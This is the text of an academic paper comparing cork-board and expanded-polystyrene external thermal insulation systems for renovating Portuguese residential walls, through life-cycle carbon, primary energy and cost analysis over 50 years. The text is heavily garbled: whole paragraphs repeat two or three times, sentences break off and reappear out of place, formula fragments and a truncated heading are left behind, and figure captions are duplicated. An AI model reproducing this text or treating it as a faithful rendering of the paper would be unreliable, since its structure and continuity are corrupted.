This paper analyses the environmental, energy, and economic performances of the External Thermal Insulation Composite System (ETICS) using agglomerated insulation cork board (ICB) or expanded polystyrene (EPS) as insulation material applied in the energetic renovation of the building envelope during a 50-year study period. A comparison between ETICS using ICB and EPS, for the same time horizon, is also presented. The environmental balance is based on “Cradle to Cradle” (C2C) Life Cycle Assessment (LCA), focusing on the carbon footprint and consumption of nonrenewable primary energy (PE-NRe). The characteristics of these products in terms of thermal insulation, the increased energy performance provided by their installation for retrofit of the buildings’ envelope, and the resulting energy savings are considered in the energy balance. The estimation of the C2C carbon and PE-NRe saved is considered in the final balance between the energy and environmental performances. ETICS with ICB is environmentally advantageous both in terms of carbon footprint and of PE-NRe. In fact, the production stage of ICB is less polluting, while EPS requires lower energy consumption to fulfil the heating and cooling needs of a flat, due to its lower U-Value, and its lower acquisition cost results in a lower C2C cost. Comparing both ETICS’ alternatives with reference solutions, it was found that the latter only perform better in the economic dimension, and only for an energy consumption to fulfil less than 25% of the heating and cooling needs. This paper represents an advance to the current state-of-the-art by including all the life-cycle stages and dimensions of the LCA in the analysis of solutions for energy renovation of building envelopes.
Introduction
Currently there are a full set of renewable materials that can be used in building energy renovation, like bamboo, wood, cork, and recycled materials, among others.Although Portugal is the world's largest producer and exporter of cork-based materials, there is no local system of incentives or support programme for the application of cork (or insulation cork boards-ICB) [1] as a sustainable material that can also provide an improvement in the energy efficiency of buildings.
ICB is a renewable, 100% natural, and a fully recyclable material made from natural cork without chemical adhesives or additives that can be applied on the envelope of new and refurbished buildings to improve their energy efficiency.The thermal performance of ICB is highlighted by its low thermal conductivity (between 0.040 and 0.045 W/m• • C).The physical and mechanical properties of cork lead Appl.Sci.2019, 9, 1285 2 of 19 to an elastic, steam permeable and durable product, which also has excellent thermal and acoustic insulation characteristics.
A solution for continuous external thermal insulation of walls of buildings is an External Thermal Insulation Composite System (ETICS).An improved energy efficiency of the envelope of new and refurbished buildings is provided by the application of ETICS as external rendering and insulation of walls.
ETICS comprise an insulation board applied over the substrate (glued, mechanically fixed, or both), above which one or two thin layers of reinforced render are applied, as shown in Figure 1.The latter can also be used to glue the insulation material and should have good adherence to the substrate, high resistance to cracking, low capillarity, and significant mechanical resistance to perforation and impact [1].ETICS can have different thicknesses and compositions, particularly concerning the percentage of organic matter of the coating layers, reinforcement materials, and fastening solutions [2].
Appl.Sci.2019, 9, 1285 2 of 19 conductivity (between 0.040 and 0.045 W/m•°C).The physical and mechanical properties of cork lead to an elastic, steam permeable and durable product, which also has excellent thermal and acoustic insulation characteristics.
A solution for continuous external thermal insulation of walls of buildings is an External Thermal Insulation Composite System (ETICS).An improved energy efficiency of the envelope of new and refurbished buildings is provided by the application of ETICS as external rendering and insulation of walls.
ETICS comprise an insulation board applied over the substrate (glued, mechanically fixed, or both), above which one or two thin layers of reinforced render are applied, as shown in Figure 1.The latter can also be used to glue the insulation material and should have good adherence to the substrate, high resistance to cracking, low capillarity, and significant mechanical resistance to perforation and impact [1].ETICS can have different thicknesses and compositions, particularly concerning the percentage of organic matter of the coating layers, reinforcement materials, and fastening solutions [2].The application of an external thermal insulation in the building allows a reduction of the thermal bridges of the building and evens out the thermal transmission coefficient throughout the façade.This technique [3] allows savings in energy, lower risks of surface condensations, an improvement of the inner thermal comfort both in winter and summer, a reduction of the external wall's thickness, and, thus, an increase of the net inner area of the construction, a reduction of the walls' weight and of the dead loads on the building, an improvement in the façades' permeability, an easier application than other techniques, and a bigger variety of the façades' colours and textures.
The improvement of the energy efficiency of the external walls of new and refurbished buildings is ensured by the application of ETICS.As shown in Figure 1, ETICS include [4]: Cement-based mortar to glue the ICB and even the walls surface, alkali-resistant glass fibre mesh placed over the ICB and inside the mortar, and pigmented mortar for smoothening and finishing made with modified potassium silicate in aqueous dispersion.The ICB in ETICS also has a high potential for worldwide export, supported by the European Technical Approval (ETA) already awarded to ETICS from some Portuguese suppliers.
ETICS with expanded polystyrene (EPS) is the most common solution in Portugal, namely because of its low cost and thermal conductivity (around 0.035 W/m•°C).EPS is produced from a single nonrenewable raw material (expandable polystyrene beads-oil-based) imported from a foreign country.The application of ICB is gaining momentum in Portugal and in several European countries, despite the recent use of this renewable material in ETICS.
This research study includes the comparative assessment of ETICS with ICB and EPS in terms of Environmental, Economic and Energy (3E) performance.The characterisation of the 3E performance of both construction systems when used in the energy renovation of the buildings envelope was based on reference literature, research works, data from companies, and software databases.The aim of this paper is therefore: The application of an external thermal insulation in the building allows a reduction of the thermal bridges of the building and evens out the thermal transmission coefficient throughout the façade.This technique [3] allows savings in energy, lower risks of surface condensations, an improvement of the inner thermal comfort both in winter and summer, a reduction of the external wall's thickness, and, thus, an increase of the net inner area of the construction, a reduction of the walls' weight and of the dead loads on the building, an improvement in the façades' permeability, an easier application than other techniques, and a bigger variety of the façades' colours and textures.
The improvement of the energy efficiency of the external walls of new and refurbished buildings is ensured by the application of ETICS.As shown in Figure 1, ETICS include [4]: Cement-based mortar to glue the ICB and even the walls surface, alkali-resistant glass fibre mesh placed over the ICB and inside the mortar, and pigmented mortar for smoothening and finishing made with modified potassium silicate in aqueous dispersion.The ICB in ETICS also has a high potential for worldwide export, supported by the European Technical Approval (ETA) already awarded to ETICS from some Portuguese suppliers.
ETICS with expanded polystyrene (EPS) is the most common solution in Portugal, namely because of its low cost and thermal conductivity (around 0.035 W/m• • C).EPS is produced from a single nonrenewable raw material (expandable polystyrene beads-oil-based) imported from a foreign country.The application of ICB is gaining momentum in Portugal and in several European countries, despite the recent use of this renewable material in ETICS.
This research study includes the comparative assessment of ETICS with ICB and EPS in terms of Environmental, Economic and Energy (3E) performance.The characterisation of the 3E performance of both construction systems when used in the energy renovation of the buildings envelope was based on reference literature, research works, data from companies, and software databases.The aim of this paper is therefore: (a) To provide meaningful results to support decision-making in this type of interventions (b) To use an innovative method (see §2 for the knowledge gap the study that this paper aims to cover) that evaluates all dimensions of performance in all the life-cycle stages (see §4) (c) To, for the first time, use this method in the energy renovation of external walls by considering two of the most used alternatives (d) The application of this method in a model building (Hexa-see §3) that is representative of the most common construction and architecture practices in Portugal [5] The environmental performance is based on Cradle to Cradle (C2C) Life-Cycle Assessment (LCA) studies and focused on the carbon footprint and on the consumption of non-renewable primary energy of the ETICS and corresponding components.The C2C economic performance considers market prices (e.g., market acquisition cost, which includes the cost of manufacture, transportation to site, and installation) and economic savings provided by these systems when used in envelope renovation [6].
"Gate to Grave" environmental and economic performances are characterized according to realistic scenarios for the following life-cycle stages: transportation and installation onsite, maintenance, demolition, and final disposal [6].The energy performance considers the main thermal insulating characteristics of these systems, and the enhancement of the energy performance and corresponding energy savings resulting from their installation for renovation of the envelope.
State of The Art: Life Cycle Assessment (LCA) Studies of Buildings' Envelope
LCA studies of building envelope alternatives have been gaining momentum in the construction industry in several countries to help the assessment of solutions to improve the overall performance of the buildings envelope.This envelope is one of the most important parts of the building in terms of its 3E performance.For example, the external walls have a direct influence in that performance due to their large contribution to the envelope's whole-life cost, users comfort, initial embodied energy, and life-cycle energy consumption.
The 3E impacts of an external wall solution directly result from the properties of the materials used (e.g., thermal properties, initial embodied energy, and design and construction process).Therefore, in the design of new construction or refurbishment alternatives for building envelopes, it is very important to have a method that enables the comparison of different solutions and determines the best solution to implement in each case.In several countries, there are ongoing studies to help the development of these methods, and some of their applications are to determine the solutions that have the best performance when used in the buildings' envelope, such as the following ones:
•
The LCA of a house in Portugal was calculated considering seven alternative solutions with similar thermal performance for exterior wall, and seven different heating systems.This study included the production stage and the maintenance requirements and the heating energy for 50 years [7].In the same country, two alternative external claddings (rendering and stone cladding) were compared in an interdisciplinary study of service life prediction and environmental LCA [8].
•
In China, for an office building, five façade solutions were compared considering their economic cost, life-cycle environmental load and cost, and operational energy.Green and general payback times were also calculated [9,10].
•
In the United States of America, 12 external wall solutions were studied in terms of embodied energy and thermal performance in a building at a cold climate region [11].
•
In Australia, a study was undertaken to demonstrate the need to consider not only the life-cycle energy of the building but also that due to activities undertaken by actual users of the building, which comprise: Embodied energy in the production of building materials, building's operational energy, and consumption of energy in periodic maintenance over a 30-year study period [12].
•
In India, the energy consumption demands of a residential building were evaluated considering different climates and envelopes (fired clay, concrete blocks, soil cement, fly ash, and aerated concrete) in the context of that country [13].
•
In the United Kingdom, a LCA from cradle to site of a low-energy house built using an offsite modular panels timber frame system was used to assess the emissions from materials used in construction, final transportation of the materials to site, wastage of materials on site, transportation of waste to final disposal, and nonrenewable energy used on site using the external thermal envelope as the comparison unit [14].
•
In Spain, a study was made, using LCA performance over an 80-year study period, for evaluating the environmental impacts of five constructive systems for the envelope of a modular house with conventional brick, conventional brick only with polyurethane insulation and also with Phase Changing Materials (PCM), hollow brick, and hollow brick with PCM [15].
•
In Italy, for a conventional house and office building, envelope solutions (with different type and width of masonry and insulating materials), facilities (heating boiler replacement), and smart systems (namely active-and passive-solar systems) were considered in the LCA performance to determine the best solution that could be applied in the construction [16].In the same country, a low-energy building with energy generation systems was assessed using a cradle to cradle LCA in order to provide energy balances and energy and environmental payback times [17].
•
In Belgium, two external wall solutions were studied via an LCA form Cradle to Grave, including the energy consumption during the use phase.A decision-support tool based on the environmental cost and quality of construction assemblies was developed and applied to this case-study of a three-floor building [18].
•
In Finland, a case-study of a building was used to confirm the influence of material choice on the building sustainability, including insulation and exterior cladding.However, only the environmental and economic performance were considered, and only for the production stage [19].
There are other cases and several methodologies being developed internationally with the purpose of optimizing the buildings performance for a more sustainable construction.The one used in this study was the 3E-C2C method developed at the Instituto Superior Técnico of University of Lisbon [6,20], which compares the 3E (Environmental, Energy, and Economy) performance of alternative solutions considering all stages of their life-cycles (from cradle to cradle-C2C), and allows the assessment, comparison, and selection of the best alternatives considering their whole-life cost, assessing the 3E's impacts, and considering all contributions for each life-cycle stage.
Since energy consumption is the factor that more prominently affects the environmental and economic performance of an envelope solution, some of the studies identified here only assess the energy performance using the Life-Cycle Energy Assessment (LCEA), not completing a full LCA in all dimensions of performance, and all of them are applied to new construction.Very few studies include all the life-cycle stages of the LCA, making this method and this particular study an innovation and an improvement for the 3E assessment of refurbished buildings envelopes relative to other studies of similar constructive solutions and with similar objectives.
Case Study-Insulation Cork Board (ICB)
The model building named Hexa comprises a ground floor for commerce and six residential floors [21] that is representative of the Portuguese buildings, either in constructive or in architectural practices [5].The flat on the right in Figure 2, located in a middle floor without buildings adjacent to the east façade, is the subject of the study.Évora was chosen as the location for Hexa in this study, in the South of Portugal.
period, not only on the lower U-value after this intervention but also on the surface (internal or external) of the external wall where the insulation is applied.In fact, the effect of a lower U-value on decreasing the energy needs for heating and cooling is maximum if the application of the insulation material is made on the external surface of this wall.
The maintenance, repair, and replacement operations of each external cladding and internal coating over the life-cycle after the renovation operation are described in Table 2. Cleaning and repainting of the whole area each 5 years; repair of 5% of the area after 10 years North and South façades are the external walls of the flat that were studied."A square metre of external wall" (being the East façade considered the same as wall W1-see Table 1-for all alternatives) is the declared unit.The reference study period is 50 years [21].In order to consider the energy renovation of the "Hexa" building façades with ETICS using ICB, two reference solutions without insulation were considered: One with a single-leaf hollow fired-clay bricks wall of with 0.22 m (W1) and another one with a cavity wall of the same material with two leaves of 0.15 m and 0.11 m (W8).Then, six improved solutions using ETICS with ICB were used for the single-leaf walls and six were used in the cavity walls (Table 1).
E-C2C Method
The energy renovation of reference walls (W1 and W8) is important.However, the heating and cooling needs (in terms of final energy consumption) of the flat depend, in each year of the study period, not only on the lower U-value after this intervention but also on the surface (internal or external) of the external wall where the insulation is applied.In fact, the effect of a lower U-value on decreasing the energy needs for heating and cooling is maximum if the application of the insulation material is made on the external surface of this wall.
The maintenance, repair, and replacement operations of each external cladding and internal coating over the life-cycle after the renovation operation are described in Table 2. Cleaning and repainting of the whole area each 5 years; repair of 5% of the area after 10 years
E-C2C Method
An integrated approach for the assessment of the 3E's (Environmental, Energy, and Economy) life-cycle of construction assemblies or materials, closely related to a building thermal performance from cradle to cradle (3E-C2C) was used in this research study [6,20].
The 3E-C2C method assesses the 3E's impacts over the whole life-cycle (C2C) of a construction material or assembly.This method takes into account all the issues that can affect these solutions, such as their performance in the use phase of the building, and its service life and recycling potential as shown in Table 3.The declared unit used in this study was "a square metre of external wall for 50 years from energy renovation (ETICS installation)," taking into account the use (including the reference service life of each solution) and end-of-life stages.A declared unit is the "quantity of a construction product for use as a reference unit" [22].It is not possible to define a functional unit (quantified performance of a product system for use as a reference unit [22]) because the external wall's alternatives under comparison do not have the same U-Value-see Table 1.Using this approach, external wall solutions can be compared even with different heat transfer coefficients, because the LCA study considers: Impacts if their production depending on their thermal insulation thickness, and the environmental impacts of their thermal performance for 50 years.
The 3E-C2C method was applied in the evaluation and comparison of the 3E performance of the energy retrofit alternatives considered in this study for two reference external walls without insulation (W1 and W8-see Table 1).The envelope renovation is provided by the application of ETICS with ICB or with EPS, considering different thicknesses of these materials.The 3E-C2C method is firstly applied to ETICS with ICB ( §5.1, applied to the case study described in §3) and then to ETICS with EPS ( §5.2, in comparison with ETICS with ICB).
The approach used in this study is in line with international and European standards and performance labels.The environmental performance results are based in C2C LCA studies and focused on the carbon footprint (expressed by the environmental impact category "Global Warming Potential"-GWP) and on the consumption of non-renewable primary energy (PE-NRe) of the materials used on the energy renovation of the external walls.Even if the 3E-C2C method applied in this study considered all environmental categories recommended by European standards, to provide a meaningful comparison of a significant number of alternatives in the 3E dimensions of performance and in all life-cycle stages, the authors decided to present here only the results for the environmental categories most valuated by the scientific community and by the decision-makers: Carbon footprint (expressed by GWP) and embodied energy (PE-NRe).The C2C economic analysis considered market prices and the "economic savings" (cooling and heating energy) given by ETICS with ICB or EPS when used in envelope renovation of buildings [23].
Environmental Performance
The quantification of the environmental performance of the 3E-C2C method follows the LCA standardised method [24] and the principles included in European standards [22,25,26].The CML 2001 baseline Environmental Impact Assessment Method (EIAM) and corresponding environmental impact categories were used in LCA results calculation.Regarding the quality of background data: The LCA databases used (Ecoinvent and ELCD) were updated within the last 10 years, and all selected datasets imply a European average technology or a specific European country.The environmental performance of each life-cycle stage is defined by: -Product Stage (A1-A3): The LCA data of the manufacture of each construction material or product started with the corresponding Life-Cycle Inventory (LCI), mainly based on updated site-specific data from Portuguese plants, thus proving its temporal, geographical, and technological representativeness.The composition considered for each material used in ETICS with ICB and EPS was based on one of the Portuguese producers [27].A detailed inventory analysis is not included in this paper but was already provided for both insulation materials in two other paper of the authors [1,23].-Construction Process Stage (A4-A5): The renovation operation corresponds to the installation of the product in the building, including: Removal of the old render and paint and corresponding transportation to waste processing and disposal, and external rendering, and insulation of the external wall with ETICS with EPS or ICB of variable thickness.-Use stage-maintenance, repair, and replacement (B2-B4): The environmental impacts of the materials for maintenance, repair, and replacement operations during the study period, including the corresponding waste flows.The impacts do not include other impacts from this operation due to their variable and unpredictable nature.-Use stage-energy performance (B6): The 3E-C2C approach determines the energy performance from the estimation of the heating and cooling energy needs during a building's operation calculated by the simplified assessment method described in Portuguese national regulations [28][29][30].These needs are, in the 3E-C2C method, divided by the area of the external wall being studied to provide a value associated to the declared unit used, and allow the estimation of their environmental impacts.This value and the environmental impacts are estimated considering a residential heating and cooling model using an updated Portuguese electricity mix [31].-End-of-life stage (C): The 3E-C2C considers the transport of the discarded product as part of the waste processing, including the transport of waste (C2), the waste processing (C3) and the waste disposal, and the physical pretreatment and management of the disposal site (C4).
The environmental impacts of demolition (C1) were not considered, as they are similar for all the alternatives.
Economic Performance
The economic module of the 3E-C2C method follows the whole-life cost (WLC) approach [32] and the principles in the European standards [33].The comparison unit between the solutions is based on the net present value (NPV) throughout the study period and considers the needs of energy for heating and cooling and the operation costs of the different substages.The NPV is estimated taking into consideration the formulas presented in Table 4. Concerning the discount rate, this value was defined based on previous studies [34,35].Based on previous studies, if a lower value is used, the difference between alternatives decreases, despite the increase of the NPV for all of them.The lower the discount rate is, the greater the influence of future costs in the life-cycle costs due to an increase in the contribution of maintenance and operation stages.(2) -Cev n , application of the EIAM (environmental impact assessment method) eco-costs; -Cec n , product and construction process stages economic cost; -Ceg n , using stages economic cost; (3) For each life-cycle stage, the economic performance is defined by: -Product and construction process stages (A1-A5): The installation cost of the ETICS in the building corresponds to the renovation described in the construction process, excluding the costs of: Workmanship for the removal of the old render and paint, and scaffolding installation on the external area of the external wall.These costs were provided by: One of the Portuguese producers of ETICS with ICB, previous research studies [6,20,33], construction firms, market surveys, and building materials suppliers [21], and reference national documents [37].-Use stage-maintenance, repair, and replacement (B2-B4): The economic cost in year "n" per m 2 of external wall includes the maintenance, repair, and replacement operations incurred in that year.-Use stage-energy cost (B6): The energy cost in year "n" per square metre of external wall corresponds to the price, considering constant prices of the heating and cooling energy calculated by the simplified assessment method described in Portuguese national regulations [28][29][30].-End-of-life stage (C and D): The economic cost in year 50 per m 2 of external wall only include: costs for transport and disposal of the building assemblies; costs and/or revenues from recycle, reuse, and energy recovery [38,39].
Comparison of the Carbon and Energy Consumption Balances of ETICS with ICB
The results achieved in the comparison of the environmental and energy consumption balances concerning the C2C carbon footprint of the external wall alternatives, expressed through the GWP (Figure 3), demonstrated an environmental impact of the alternatives at stages A1-A3 between 72% and 74% of the total C2C GWP, without energy for heating or cooling, and a C2-C4 and D between 1% and 3% of the total C2C GWP, without energy for heating or cooling, and directly proportional to the thickness of insulation applied.The GWP on the B2-B4 stages are similar for all alternatives, due to their equal maintenance strategy, shown in Table 2, and represent 32% to 39% of their C2C GWP in the improved solutions and about 98% for the reference walls.The C2C consumption of PE-NRe (Figure 4) of the external wall alternatives expresses a performance similar to GWP.The impact at stages A1-A3 represent between 61% and 66% and at the end-of-life between −1 and 0%.The B2-B4 stages represent the remaining 98% C2C PE-NRe for the reference solution, and between 32% and 39% for the remaining solutions, without considering the energy needed for heating and cooling (in terms of final energy consumption).The C2C consumption of PE-NRe (Figure 4) of the external wall alternatives expresses a performance similar to GWP.The impact at stages A1-A3 represent between 61% and 66% and at the end-of-life between −1 and 0%.The B2-B4 stages represent the remaining 98% C2C PE-NRe for the reference solution, and between 32% and 39% for the remaining solutions, without considering the energy needed for heating and cooling (in terms of final energy consumption).
The C2C consumption of PE-NRe (Figure 4) of the external wall alternatives expresses a performance similar to GWP.The impact at stages A1-A3 represent between 61% and 66% and at the end-of-life between −1 and 0%.The B2-B4 stages represent the remaining 98% C2C PE-NRe for the reference solution, and between 32% and 39% for the remaining solutions, without considering the energy needed for heating and cooling (in terms of final energy consumption).
Energy Savings in Heating and Cooling of ETICS with ICB
The results achieved in the economic balance concerning the "environmental impact savings" demonstrated that the application of the maximum thickness of ICB in ETICS (9 cm) on the external surface of these walls can result on a carbon saving from 24% to 31%.Similar results were achieved for the "environmental impact savings" of consumption of PE-NRe for the energy of heating and cooling during the study period.Thus, analysing the C2C PE-NRe and GWP with energy for heating and cooling, it was found that the alternatives with ETICS with ICB present from 14% to 26% lower impacts than reference ones.
Economic Costs and Benefits of ETICS with ICB
The results achieved for the economic balance regarding the use of ETICS with ICB show that the NPV of the C2C cost of the external wall alternatives (Figure 5) is proportional to the thickness of
Energy Savings in Heating and Cooling of ETICS with ICB
The results achieved in the economic balance concerning the "environmental impact savings" demonstrated that the application of the maximum thickness of ICB in ETICS (9 cm) on the external surface of these walls can result on a carbon saving from 24% to 31%.Similar results were achieved for the "environmental impact savings" of consumption of PE-NRe for the energy of heating and cooling during the study period.Thus, analysing the C2C PE-NRe and GWP with energy for heating and cooling, it was found that the alternatives with ETICS with ICB present from 14% to 26% lower impacts than reference ones.
Economic Costs and Benefits of ETICS with ICB
The results achieved for the economic balance regarding the use of ETICS with ICB show that the NPV of the C2C cost of the external wall alternatives (Figure 5) is proportional to the thickness of ICB applied at stages A1-A3, A4, and A5 varying from 31% to 33% and at the end-of-life with 1%.The NPV of the maintenance, repair and replacement operations (stages B2-B4) is similar for all alternatives and represents between 52% and 55% for the reference wall and 41% for the remaining solutions.The remaining contribution of the NPV is about 46% for W1 and 43% for W8 and, according to their heating and cooling needs, and represents 24% to 26% for the remaining solutions.
With the results shown in Figure 5, one can conclude that there are no wall alternatives with ETICS with ICB that can provide any "economic savings" in comparison to the reference solutions.However, the results shown were obtained considering a consumption of energy during the B6 sub-stage to satisfy only 10% of the needs for heating and cooling (a realistic value for Portugal in the present).These "economic savings" only arise, as shown in Figure 6, if higher values are considered to simulate future expectable scenarios for dwellings or multi-familiar residential buildings.In this figure, it is possible to conclude that, considering a consumption of energy during the B6 substage to fulfil 35% or more of the heating and cooling needs, the alternatives with 9 cm of ICB in ETICS (W7 in the single-leaf wall group) have a better performance than the reference walls.In the cavity wall group, this value has to be increased to 50% to allow another alternative with 9 cm of ICB in ETICS (W14) to be cheaper than the reference walls.
to simulate future expectable scenarios for dwellings or multi-familiar residential buildings.In this figure, it is possible to conclude that, considering a consumption of energy during the B6 substage to fulfil 35% or more of the heating and cooling needs, the alternatives with 9 cm of ICB in ETICS (W7 in the single-leaf wall group) have a better performance than the reference walls.In the cavity wall group, this value has to be increased to 50% to allow another alternative with 9 cm of ICB in ETICS (W14) to be cheaper than the reference walls.to simulate future expectable scenarios for dwellings or multi-familiar residential buildings.In this figure, it is possible to conclude that, considering a consumption of energy during the B6 substage to fulfil 35% or more of the heating and cooling needs, the alternatives with 9 cm of ICB in ETICS (W7 in the single-leaf wall group) have a better performance than the reference walls.In the cavity wall group, this value has to be increased to 50% to allow another alternative with 9 cm of ICB in ETICS (W14) to be cheaper than the reference walls.
Comparative 3E Performance of ETICS with ICB and Expanded Polystyrene (EPS)
In this section, in order to compare the energy renovation of the "Hexa" building façades with ETICS using EPS or ICB, the same two reference solutions presented before (W1 and W8) were considered.Then, six previously studied solutions using ETICS with ICB (W4, W6, W7, W11, W13, W14) and six new using ETICS with EPS (WE4, WE6, WE7, WE11, WE13, WE14) were compared (Table 5).The study parameters used for the comparison of the 3E performance of all these solutions are the same as the ones described in §4.
The comparison presented in this section is made between improved solutions with the same thickness of insulation in both construction systems and solutions with the same U-value, even though the difference between U-values of solutions with the same thickness of EPS or ICB is lower than 10%.
The comparison of the energy performance considered the main thermal insulating characteristics of ETICS with EPS or with ICB as insulating material, including the improvements in the energy performance of the building's envelope after its installation for retrofitting and the corresponding energy savings.Because of ongoing changes in building occupancy and in the comfort demands that led to a higher consumption of energy by heating and cooling equipment, it was considered: - The default scenario-10% of the energy needs, according with national regulation.-Higher values-30% and 50%, which simulate future expectable scenarios for dwellings or multi-familiar residential buildings [40].In fact, both values were used in previous studies [34,41] because telecommuting is each day more frequent, and elderly people also stay at home most of the day, which means that energy needs for residential buildings can be estimated based on the use of heating or cooling equipment for much more than the 10% of daytime prescribed in the national regulation.
Comparison of the Carbon and Energy Consumption Balances of ETICS with ICB or EPS Boards
The importance of the use of local renewable resources in buildings for energy renovation is highlighted by this study, namely the application of ETICS with ICB as external rendering and insulation of external walls as an alternative to the application of the same system with a non-renewable material as insulating material (EPS).This section presents the results achieved in terms of the comparison of the environmental and energy consumption balances related to the application of the 3E-C2C method to the use of these construction systems in 12 of the 14 external alternatives defined for this study.
The results achieved in the comparison of the C2C carbon footprint of the external wall alternatives, expressed by the GWP (Figure 7), demonstrated an environmental advantage of the alternatives with ETICS with ICB at stages A1-A3 between 29% and 54% (without energy for heating or cooling) when compared to solutions with similar thickness using EPS.In fact, this difference is proportional to the thickness of the insulation board applied on the external surface.This environmental disadvantage results from the use of nonrenewable resources in the production of EPS.The GWP on the B2-B4 stages are similar for all alternatives, due to their equal maintenance strategy (Table 2) and represents between 23% and 39% of their C2C GWP, without considering the energy consumption for heating and cooling.
environmental disadvantage results from the use of nonrenewable resources in the production of EPS.The GWP on the B2-B4 stages are similar for all alternatives, due to their equal maintenance strategy (Table 2) and represents between 23% and 39% of their C2C GWP, without considering the energy consumption for heating and cooling.
The C2C consumption of PE-NRe (Figure 8) expresses a performance similar to GWP.In fact, the environmental advantages of the ETICS with ICB insulation at stages A1-A3 in comparison to EPS solution is also proportional to the thickness of the insulation board applied and can vary from 44% to 78%, thus confirming the environmental advantage of using renewable materials in the production of the insulating element.The C2C consumption of PE-NRe (Figure 8) expresses a performance similar to GWP.In fact, the environmental advantages of the ETICS with ICB insulation at stages A1-A3 in comparison to EPS solution is also proportional to the thickness of the insulation board applied and can vary from 44% to 78%, thus confirming the environmental advantage of using renewable materials in the production of the insulating element.
defined for this study.
The results achieved in the comparison of the C2C carbon footprint of the external wall alternatives, expressed by the GWP (Figure 7), demonstrated an environmental advantage of the alternatives with ETICS with ICB at stages A1-A3 between 29% and 54% (without energy for heating or cooling) when compared to solutions with similar thickness using EPS.In fact, this difference is proportional to the thickness of the insulation board applied on the external surface.This environmental disadvantage results from the use of nonrenewable resources in the production of EPS.The GWP on the B2-B4 stages are similar for all alternatives, due to their equal maintenance strategy (Table 2) and represents between 23% and 39% of their C2C GWP, without considering the energy consumption for heating and cooling.
The C2C consumption of PE-NRe (Figure 8) expresses a performance similar to GWP.In fact, the environmental advantages of the ETICS with ICB insulation at stages A1-A3 in comparison to EPS solution is also proportional to the thickness of the insulation board applied and can vary from 44% to 78%, thus confirming the environmental advantage of using renewable materials in the production of the insulating element.
Comparison of the Energy Savings in Heating and Cooling of ETICS with ICB or EPS
The results achieved in the comparison of the economic balance concerning the "environmental impact savings" demonstrate that the use of the maximum thickness (9 cm) of insulation in ETICS with ICB or EPS on the external surface of these walls can result in a carbon saving in comparison with the reference alternatives, from 24% to 31%.Similar results were achieved for the "environmental impact savings" of consumption of PE-NRe for the energy of heating and cooling during the study period.Thus, analysing the C2C PE-NRe and GWP with energy for heating and cooling, it was found that the alternatives with ETICS with ICB or EPS present from 13% to 26% lower impacts than reference ones.
These "environmental impact and economic savings" during the B6 substage are expressed in this study per m 2 of the external wall of the flat chosen, but the corresponding savings provided by the implementation of this energy renovation in Portugal or in other countries can be extrapolated depending on the thermal performance characteristics of the majority of existing buildings.
Comparison of the Economic Costs and Benefits of ETICS with ICB or EPS
The results achieved in the comparison of the economic balance concerning the NPV of the C2C cost of the external wall alternatives (Figure 9) show that the use of EPS in ETICS provides a saving in the acquisition costs at stages A1-A3, A4 and A5 varying from 28% to 30%.When analysing the NPV of the C2C cost, this value is reduced due to the significance of the maintenance and energy costs, but it still reveals an economic advantage of using EPS in ETICS due to its lower market cost when compared with ICB.With the results from Figure 9, it is also possible to conclude that none of the wall alternatives where ETICS with ICB or with EPS were applied provide any "economic savings" in comparison to the reference solutions.However, the results shown were obtained considering a consumption of energy corresponding only to 10% of the needs for heating and cooling during the B6 substage.If higher values (35% and 50%) are used to simulate future expectable scenarios for dwellings or multi-familiar residential buildings, these "economic savings" become more significant.In fact, Figure 10 demonstrates that the alternatives with 9 cm of ICB in ETICS have a better performance than the reference walls from an energy consumption point of view to fulfil 35% (W7 in the single-leaf wall group) or 50% (W14 in the cavity wall group) of the heating and cooling needs.For a consumption value of 25%, the alternative of ETICS with 9 cm of EPS (WE7) becomes the best alternative in the single-leaf wall group.In the cavity wall group the WE14 solution (also with 9 cm of EPS) becomes the best alternative only for a consumption pattern of 35%.Nevertheless, the alternatives with ICB in ETICS always present a higher NPV of the C2C cost than the ones with EPS independently of the consumption pattern that is considered for the use stage, because of the higher acquisition cost and U-value for the same thickness of insulation.
Discussion and Conclusions
The results of this study show that external wall alternatives of ETICS with ICB are environmentally advantageous when producing the construction materials used, in terms of the categories "Global Warming Potential" (GWP) and consumption of nonrenewable primary energy (PE-NRe) in comparison with the same solution with EPS.
If ETICS with ICB and with EPS are compared considering the same thickness, the EPS solution requires lower energy consumption to fulfil the heating and cooling needs of the flat due to its lower U-Value.This solution always presents a lower "Cradle to Cradle" (C2C) cost because of its lower
Discussion and Conclusions
The results of this study show that external wall alternatives of ETICS with ICB are environmentally advantageous when producing the construction materials used, in terms of the categories "Global Warming Potential" (GWP) and consumption of nonrenewable primary energy (PE-NRe) in comparison with the same solution with EPS.
If ETICS with ICB and with EPS are compared considering the same thickness, the EPS solution requires lower energy consumption to fulfil the heating and cooling needs of the flat due to its lower U-Value.This solution always presents a lower "Cradle to Cradle" (C2C) cost because of its lower acquisition cost.
If two solutions with similar U-values are compared (but with different thicknesses, since the ICB boards require a bigger thickness due to the higher thermal transmittance), the consumption of energy to satisfy the heating and cooling needs is almost the same, but their acquisition cost and the energy and resources necessary for the production of their materials are different.Due to the higher cost of ICB, the EPS solution always presents a lower net present value (NPV).
The 3E-C2C analysis showed that reference alternatives only perform better in the economic dimension, and only for an energy consumption to fulfil less than 25% of the heating and cooling needs.Therefore, to provide more specific support for decision-making, Tables 6 and 7 present, respectively, single-leaf and cavity external wall solutions with the best performance (in each dimension and life-cycle stage), without considering the reference walls.When comparing the cavity wall solutions, it was found that solution W9 presents the best environmental performance if energy use for heating and cooling is not considered (Table 7).When taking into consideration the energy used for heating and cooling, the best environmental performance is shown by W14.For energy needs higher than 10%, the most economical solution is WE14.
The research presented in this paper provides an advance to current state of art by including all the life-cycle stages and dimensions of the LCA in the analysis of solutions for energy renovation of building envelopes.The analysis presented here can be replicated in other solutions for thermal insulation of the building's envelope, or similar solutions applied in other buildings or weather conditions (namely other countries).Moreover, the conclusions reached show thermal retrofitting has environmental benefits and that environmentally sustainable materials need to be more frequently used in construction.In fact, the environmental advantage of the latter is already known and proved, but they are still expensive.Therefore, a scale effect on their use can promote a decrease in price, making them more competitive in the construction market, or the public financing or the thermal retrofit interventions could include environmental sustainability requirements to reach similar benefits.
Figure 1 .
Figure 1.Cross-section of an external wall with External Thermal Insulation Composite System (ETICS) with expanded polystyrene (EPS) applied as external rendering and insulation.
Figure 1 .
Figure 1.Cross-section of an external wall with External Thermal Insulation Composite System (ETICS) with expanded polystyrene (EPS) applied as external rendering and insulation.
Figure 2 .
Figure 2. Residential flat model used in the study (right).
Figure 2 .
Figure 2. Residential flat model used in the study (right).
